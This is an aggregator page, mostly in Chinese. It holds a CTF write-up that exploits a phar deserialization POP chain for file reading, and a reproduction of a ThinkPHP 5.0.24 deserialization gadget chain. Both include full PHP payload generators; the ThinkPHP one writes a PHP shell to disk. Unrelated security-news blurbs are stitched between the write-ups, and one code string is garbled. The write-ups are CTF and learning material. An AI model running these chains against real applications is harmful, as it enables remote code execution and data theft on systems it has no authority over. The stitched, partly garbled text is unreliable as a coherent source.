Aggregator

0x00关于本文 感谢@glzjn大佬提供的buuoj复现环境！ 0x01漏洞突破口 LFI  在注册登陆简单测试之后可以轻易地发现download.php的LFI漏洞

 后退两个目录即可获取源码(怎么知道是后退两个目录？多试试就知道了)，我们发现download.php有这一行
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) { 看来很不幸，没法直接读flag
但是好在这个漏洞可以把题目中的所有源码都下载下来，方便我们审计
0x01 反序列化漏洞发现 看到download.php代码中存在这一行 include "class.php"; 一般来说像CTF题目这种超级超级小规模的项目是不会需要真正用到OOP来开发的，除非....想要用到相关的漏洞，比如反序列化 哪里有反序列化点呢？就藏在文件操作中。(相关阅读利用 phar 拓展 php 反序列化漏洞攻击面) 在download.php中存在如下代码（事实证明download.php并不能正常利用，在之后我会讲） $file = new File(); ... $filename = (string) $_POST['filename']; ... $file->open($filename) 跟到File类里面的open函数中，这个$filename被直接带入 file_exists($filename) 这样大黑客们就可以利用phar://伪协议用反序列化搞事情，好了我们开始审计代码！
0x02 POP Chain构造 我们现在需要构造POP Chain来RCE或者文件读取，要审计反序列化，我们第一步是需要找到起点，那就是__destruct或__wakeup函数，不过这道题目里面没有__wakeup函数，只有两个__destruct函数。 首先看到FileList类的__destruct     public function __destruct() {         $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';         $table .= '<thead><tr>';         foreach ($this->funcs as $func) {             $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';         }         $table .= '<th scope="col" class="text-center">Opt</th>';         $table .= '</thead><tbody>';         foreach ($this->results as $filename => $result) {             $table .= '<tr>';             foreach ($result as $func => $value) {                 $table .= '<td class="text-center">' . htmlentities($value) . '</td>';             }             $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">娑撳��娴�</a> / <a href="#" class="delete">閸掔娀娅�</a></td>';             $table .= '</tr>';         }         echo $table;     } } 好像啥都没有的样子。。。 那再看User类的     public function __destruct() {         $this->db->close();     } 这个$this->db我们是可以操纵的，那我们首先尝试找到一个close函数来继续这个链条 而File类里面恰巧有一个close函数，但是代码只有一句。 return file_get_contents($this->filename); 能读取是能读取，但是我又不能输出，这怎么可以呢？ 这里$this->db->close()除了可以调用close函数之外，还可以在别的类不存在close的时候调用__call函数。 果不其然，在FileList类找到了     public function __call($func, $args) {         array_push($this->funcs, $func);         foreach ($this->files as $file) {             $this->results[$file->name()][$func] = $file->$func();         }     } 其中$func是"close",这个函数首先把"close"塞到了$this->funcs的尾部，接着遍历$files做了些蜜汁操作 $this->results[$file->name()][$func] = $file->$func(); 看了下大概是给File类量身定做的，只有File类才同时有name和close，而这里我们要是操纵$file的确能把内容塞到$this->results数组里面。 可是写进去了怎么读出来呢，那就要看到FileList类的__destruct函数了，仔细看下这个函数发现真的能把结果输出出来，那这样我们就形成了一条从User类到FileList类，再到File类的POP Chain。 0x03 EXP构造 （filename为什么是/flag.txt?我也想知道。这部分我是在网上看到别人的EXP这么写的 <?php class File {     public $filename;     function __construct()     {         $this->filename="/flag.txt";
    } } class FileList  {     private $files;     function __construct()     {         $this->files=[new File()];     } }
class User {     public $db;     function __construct()     {         $this->db=new FileList();     } } $o = new User(); $filename = 'avatar.phar.gif'; file_exists($filename) ? unlink($filename) : null; $phar=new Phar($filename); $phar->startBuffering(); $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); $phar->setMetadata($o); $phar->addFromString("foo.txt","bar"); $phar->stopBuffering(); ?> 0x04 最后利用 本来以为直接download.php里面直接用phar就可以的，没想到这个文件始终读不出来
接着才发现了我刚刚忽略的一行 ini_set("open_basedir", getcwd() . ":/etc:/tmp"); 原来他这里搞了个open_basedir害得我读不出来，但是问题不大，因为delete.php也操作文件，甚至不需要换参数。 url一换，结果就出来了

在提笔写今年的年终总结之前，我已经收到了好多催更提

在提笔写今年的年终总结之前，我已经收到了好多催更提

Online retail apps are a perfect storm of interconnecting infrastructure and insertion points. F5 Labs' Preston Hogue writes for SecurityWeek, discussing the wide range of risks that can threaten your apps, and how the need to understand the entire organism is critical.

Knowing the trends in cyber security is key to protecting yourself. F5 Labs' Raymond Pompon writes for Teiss, discussing the three trends that will drive challenges and opportunities in 2020.

这篇文章中我们将提供一个极简的纵深防御实例，这个实例应该是目前绝大多数公司防御体系的一个基础版本。

Sentry因过时依赖导致的安全问题 前言 这次挖的其实没啥技术含量 但是从依赖挖掘到漏洞还是比较少见的. 挖掘过程 下载源码后,发现src目录有so

黑产研究—“秒拨IP挖掘机”制作，故事背景 黑产的本质是利益，因利益而存......

The Service Worker web API is a powerful new API for web browsers. During our research, we have found several ways attackers can leverage this API to enhance their low-to-medium risk findings into a powerful and meaningful attack. By...

问题的引出 众所周知，ContentProviders是android用于跨进程共享数据的一种方式。ContentProvider需要媒介进行数据存储, 最常用的就是SQLite数据库。我们知道，web应用常常由于数据库操作语句编写不当造成sql注入漏洞，其实，Android也不例外。在导出的 Co

Guardicore Centra v 31 includes such features as user-based rules and a threat intelligence firewall. Read more about the updates and improvements.

前言 之前在一些博客上看到过讲如何实现延迟队列，但是平时没用上也没有动手实现过。 在上次面试的时候，面试官也问过我有没有用过延迟队列，最后凭借着记忆讲了下

Although ransomware has declined in media coverage, it appears to be gaining in strategic precision. F5 Labs' David Warburton writes for IDG Connect, discussing concrete steps for public sector organizations to defend themselves effectively.

Leverage the benefits of VDI without opening yourself to security risk. Guardicore provides user access management and microsegmentation for Citrix.

F5 Labs recommends security controls based on the top 2019 cyber threats. Learn how these recommendations tie into the best practices to prevent data breaches.

0x00关于本文 本文内容是针对ThinkPHP v5.0. fx 反序列化利用链挖掘的复现。
本文会从一 个只会反序列化基础知识的小白的视角一步一步复现这个利用链，在阅读本文的时候需要具备一定反序列化的基础，同时配合ThinkPHP v5.0.x 反序列化利用链挖掘阅读。

在复现的过程中由于原文写的过于模糊，有一部分利用链不太一样但是开头结尾是一样的。
同时很不幸，该利用链不能在Windows上利用（待会我会说原因的），期待各位大佬找到一条通用的pop chain
0x01环境搭建 首先需要有个ThinkPHP V5.0.24的环境，这个过程就略过去了，接着再在application/index/controller/Index.php写下如下代码 <?php namespace app\index\controller;
class Index {     public function index()     {         echo "Welcome thinkphp 5.0.24";         unserialize(base64_decode($_POST['payload']));     } } 为什么我要选择使用base64_decode的办法传递Payload呢，那是因为在序列化字符串中往往有一些不可见字符，复制的话会漏掉，索性base64 0x02万事开头难--第一个类的反序列化及为什么要命名空间(namespace)以及extents 想要搞反序列化必然是需要一个起点的，原文使用了Windows类来开始 那首先我们需要一个Windows类 于是构建代码如下
<?php namespace think\process\pipes; class Windows {
} $x=new Windows(); echo serialize($x); echo "<p>"; echo base64_encode(serialize($x)); 底下我分别输出了反序列化的结果和base64编码过后的反序列化结果以便检查

为什么需要在前面加个namespace呢？
因为ThinkPHP中的Windows类是有namespace的，长这样：
namespace think\process\pipes;
use think\Process;
class Windows extends Pipes { ...... 我们需要指名道姓地钦点它才可以，这样反序列化出来的字符串长这样：O:27:"think\process\pipes\Windows":0:{}
是包含了命名空间的，而如果不加的话字符串就成了O:7:"Windows":0:{} 它们是不一样的，在我们实际测试中发现只有前面那种才能引起反序列化 （ThinkPHP官方是不会写什么函数被调用的话的，因此这句话当然是我加在函数里面以便调试的）
其中Windows类继承了抽象类Pipes，但是实际测试发现不管父类对于生成的代码没有影响，因此我们可以直接忽略父类，缩短我们的POC 0x03抽象类的利用和利用链的连接 文中说到我们需要利用__toString做跳板，并找到了Model抽象类 可是这个抽象类，我们不能直接定义，那该怎么办呢？答案很简单，找子类 我们很轻松地找到了Pivot子类，它长这样 namespace think\model;
use think\Model;
class Pivot extends Model { 抄过去再改改就成了这样 <?php namespace think\model;
class Pivot {
} namespace think\process\pipes; use think\model\Pivot; class Windows {     public function __construct()     {         $this->files=[new Pivot()];     } } $x=new Windows(); echo serialize($x); echo "<p>"; echo base64_encode(serialize($x));
关于处理子类，我在上一节已经说过，就抄它的namespace，extends去掉就可以了。 接着我们要把它塞到Windows类的file里面去，这里首先要注意，我们不能直接这么写代码 protected $file=[new Pivot()]; 而要定义一个构造函数，因为Pivot()是动态的，需要__construct函数来动态赋值
如果读者足够细心还会发现一行莫名其妙的代码 use think\model\Pivot; 根本不知道从哪儿来的 而如果我们不加的话就会出现这样的错误 ( ! ) Fatal error: Uncaught Error: Class 'think\process\pipes\Pivot' not found in D:\wamp64\www\thinkphp_5.0.24\public\index4.php on line 14 这一行功能是导入已有的命名空间，之所以要这么做是因为它是命名空间think\model（我们刚刚定义在前面的）下的Pivot类，以后遇到了类似情况照此处理，即命名空间+"\"+类名 就这样我们成功调用了toArray函数 0x04不知道标题取啥反正下一步 接下来的利用花了我很长时间。 作者说要执行$item[$key] = $value ? $value->getAttr($attr) : null;这部分代码，同时操控$value来使其调用__call(因为$value是我们选择的对象，这个对象没有getAttr函数就会调用__call函数)
作者说关键是这两行控制了$value，因此我们想要控制$value那我们必须要通过操控这两行来操控$value。 $modelRelation = $this->$relation(); $value = $this->getRelationData($modelRelation);
那我们开始分析了，首先想要进到这个If分支需要通过         if (!empty($this->append)) { 的检验，所以我们首先得给$this->append设个值 那么就需要考虑这句话了 $modelRelation = $this->$relation(); 作者说要利用getError是咋回事呢？这个和getError有啥关系? 仔细看代码，是$this->$relation()不是$this->relation()，$relation是一个变量，因此我们要是能把$relation设定成getError这个字符串就可以了。 作者没有提到怎么操纵，于是我得自己想办法看调用路径 foreach ($this->append as $key => $name) { 接着是  $relation = Loader::parseName($name, 1, false); 这个append我们可以控制，这个parseName函数就是个转换命名格式的函数，不会对getError这个字符串有改变，于是只需要再Pivot类里面进行如下改动就可以 protected $append = ['getError']; 由于getError函数返回的就是this->error，这个值我们可以操控，所以我们就可以操控$modelRelation了。
0x05换条POP链 作者说了，要把$modelRelation换成一个HasOne对象，因为这里面有一个getRelationData可以调用。构造到这一步，当前代码如下 <?php namespace think\model\relation; class HasOne { }
namespace think\model;
use think\model\relation\HasOne; class Pivot {     protected $append = ['getError'];     public function __construct()     {         $this->error=new HasOne();     } } namespace think\process\pipes; use think\model\Pivot; class Windows {     public function __construct()     {         $this->files=[new Pivot()];     } } $x=new Windows(); echo serialize($x); echo "<p>"; echo base64_encode(serialize($x)); 可是到了这一步，我搞不懂作者是怎么弄得了，他写的实在是太模糊了，所以我换了条POP链，发现居然也能用 在HasOne类的getRelation函数中有如下代码   $relationModel = $this->query             ->removeWhereField($this->foreignKey)             ->where($this->foreignKey, $this->parent->$localKey)             ->relation($subRelation)             ->find(); 我发现这个query可以利用，这个foreignKey也可以操控，那不就可以了吗？ 抱着试试看的想法，把$this->query设成Output,直接跳到Output类去。 结果成功了
0x06最后的坑 如果看懂了我前面写的东西（没看懂就算了。。。）那么剩下的代码就不难构造了 <?php //File类 namespace think\cache\driver; class File {     protected $tag='sodayo';     protected $options = [         'expire'        => 0,         'cache_subdir'  => false,         'prefix'        => false,         'path'          => 'php://filter/write=string.rot13/resource=./<?cuc cucvasb();?>',         'data_compress' => false,     ]; }
//Memcached类 namespace think\session\driver; use think\cache\driver\File; class Memcached {     protected $handler;     function __construct()     {         $this->handler=new File();     } }
//Output类 namespace think\console; use think\session\driver\Memcached; class Output {     protected $styles = ['removeWhereField'];     function __construct()     {         $this->handle=new Memcached();     } } //HasOne类 namespace think\model\relation; use think\console\Output; class HasOne {     //protected $foreignKey="sss"; //$this->query->removeWhereField($this->foreignKey)     function __construct()     {         $this->query=new Output();     } }
//Pivot类 namespace think\model; use think\model\relation\HasOne; class Pivot {     protected $append = ['getError'];     public function __construct()     {         $this->error=new HasOne();     } } //Windows类 namespace think\process\pipes; use think\model\Pivot; class Windows {     public function __construct()     {         $this->files=[new Pivot()];     } } $x=new Windows(); echo serialize($x); echo "<p>"; echo base64_encode(serialize($x)); （其实是我懒得写了） 可是发现file_get_contents后面就运行不了了？ 调试了半天才发现，Windows系统里面创建不了含有某些特殊字符的文件，我一口老血喷到屏幕上 最后在Linux上面复现成功
0x06最后 这什么鬼玩意，搞了那么半天才复现一条鸡肋反序列化链，而且我从来没见过哪个程序员允许我控制整个路径或者反序列化过程，很怀疑这玩意的使用价值

一开始只是抱着开阔视野的心态来的，想着算法是IT行业哪里都会用到的东西，学完之后觉得卜老师不愧是教了13年的老师，很多地方都很受益，虽然不是专门做算法的，其中的很多思想都对以后的工作有一定启发。

记一次GorgonAPT组织的完整攻击